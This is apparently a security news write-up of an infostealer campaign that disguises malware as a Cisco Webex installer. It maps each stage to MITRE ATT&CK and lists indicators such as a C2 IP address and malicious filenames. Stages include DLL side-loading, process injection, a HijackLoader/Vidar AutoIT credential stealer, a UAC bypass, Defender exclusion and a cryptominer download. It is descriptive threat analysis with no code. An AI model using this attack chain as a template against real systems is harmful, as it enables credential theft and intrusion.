Weaponized Cisco Webex Meetings App

A novel information-stealing campaign detailing the attackers’ tactics, techniques, and procedures (TTPs) throughout the attack lifecycle, where the Mitre ATT&CK framework is used to classify these TTPs and identify potential detection points. 

By examining the campaign’s behavior and communication with the command and control server (C2), researchers reveal the step-by-step progression from initial access to credential theft. 

EHA

Adversaries employed social engineering to trick users into downloading password-protected archives (ZIP) disguised as legitimate software.

Scan Your Business Email Inbox to Find Advanced Email Threats - Try AI-Powered Free Threat Scan

The archive filenames contained the password (!$Full_pAssW0rd_4434_$etup.zip) and embedded a RAR archive and text files. 

Virustotal search results for similar filenames

A VirusTotal search revealed around 400 similar filenames submitted since 2024, indicating a broader campaign, which suggests that the attackers are targeting users by leveraging common search terms for pirated software and incorporating patterns like “!@Full_FiIe_lnSide@!” or “!@passcode_” within filenames. 

An attacker tricked a user into running a malicious file disguised as a legitimate Cisco Webex installer (Setup.exe) by exploiting a DLL side-loading vulnerability in the real ptService.exe module to launch a hidden loader program. 

After that, the loader put itself into a different, trusted process (more.com) to hide what it was doing even more, which is a multi-stage attack that combines social engineering (T1204), DLL side-loading (T1574.002), and process injection (T1055). 

HijackLoader, a malware loader, fetches and executes an AutoIT script (GraphicsFillRect.au3) that steals credentials and establishes a persistent connection to a C2 server, involving two MITRE ATT&CK techniques.

T1105 (Ingress Tool Transfer) for downloading the script and T1071.001 (Application Layer Protocol: Web Protocols) for maintaining communication with the C2 server, identified as belonging to the Vidar botnet based on its IP address. 

exfiltrating to the C2 server

A malicious AutoIT script (GraphicsFillRect.au3) was detected establishing a connection to a C2 server (78.47.78.87) while reading login data from Chrome and Firefox browsers and Zoom, suggesting data exfiltration. 

According to Trellix, the script also downloaded additional executables (GCGHJEBGHJ.exe and AFIEGIECGC.exe) into the ProgramData folder, indicating potential further malicious activity.  

downloads additional PE files

The malware exploited a COM Elevation Moniker vulnerability to bypass User Account Control and gain administrator privileges, and then disabled Windows Defender by adding itself to the exclusion list. 

Next, the malware injected itself into MSBuild.exe, which connected to a suspicious IP address and downloaded a cryptominer.

Finally, the malware launched a PowerShell script that executed a series of obfuscated commands, ultimately side-loading a malicious DLL through a legitimate VMware process. 

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free